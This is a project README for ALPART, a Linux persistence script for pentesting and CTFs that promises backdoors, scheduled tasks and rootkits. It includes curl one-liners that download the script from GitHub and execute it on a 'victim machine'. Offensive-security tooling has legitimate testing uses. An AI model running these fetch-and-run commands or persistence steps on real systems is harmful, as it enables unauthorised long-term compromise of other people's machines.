This shell script offers an interactive menu with multiple options to do persistence on a Linux system, which makes it ideal for Pentesting or CTFs. In addition, it is compatible with bash, sh, ash and zsh in case the victim does not have bash.
To get started, simply run the script in a terminal and choose from the various options available to create backdoors, scheduled tasks, rootkits and other persistence techniques. This script is easy to use and is designed to save time and increase efficiency in Pentesting or CTFs situations.
Upload script to victim machine and start it with bash or any available shell
bash ALPART.sh
sh ALPART.sh
zsh ALPART.sh
ash ALPART.sh
or download from original repo and execute
curl -fsSL https://raw.githubusercontent.com/T1erno/ALPART/master/ALPART.sh -O ; bash ALPART.sh
curl -fsSL https://raw.githubusercontent.com/T1erno/ALPART/master/ALPART.sh -O ; sh ALPART.sh
- Add moar methods
- Check compatibility with other shells
Buy milk and eggs- Add optargs for a no interactive execution
Code contributions always are welcome :^) For contributing, please use dev branch for your changes.
If you find a bug please open an issue. When reporting a bug, it's helpful to provide as much information as possible so that others can reproduce the error and offer suggestions f or a solution. Here are some things you might want to consider including in your bug report:
- A description of the problem
- Steps to reproduce the problem
- Screenshots or screen recordings if applicable
- The version of your operating system and any relevant software
- Any error messages or stack traces that you received
- Any additional context that might be helpful in understanding the problem
The more information you provide, the easier it will be for others to understand and address the issue :^)
This tool is provided for educational and research purposes only. Use of this tool on any system without the explicit permission of the system owner is illegal and strictly prohibited. The author is not responsible for any damages or consequences that may arise from the use of this tool. The user is responsible for complying with all applicable local, state and federal laws and regulations. Use of this tool is at your own risk and responsibility.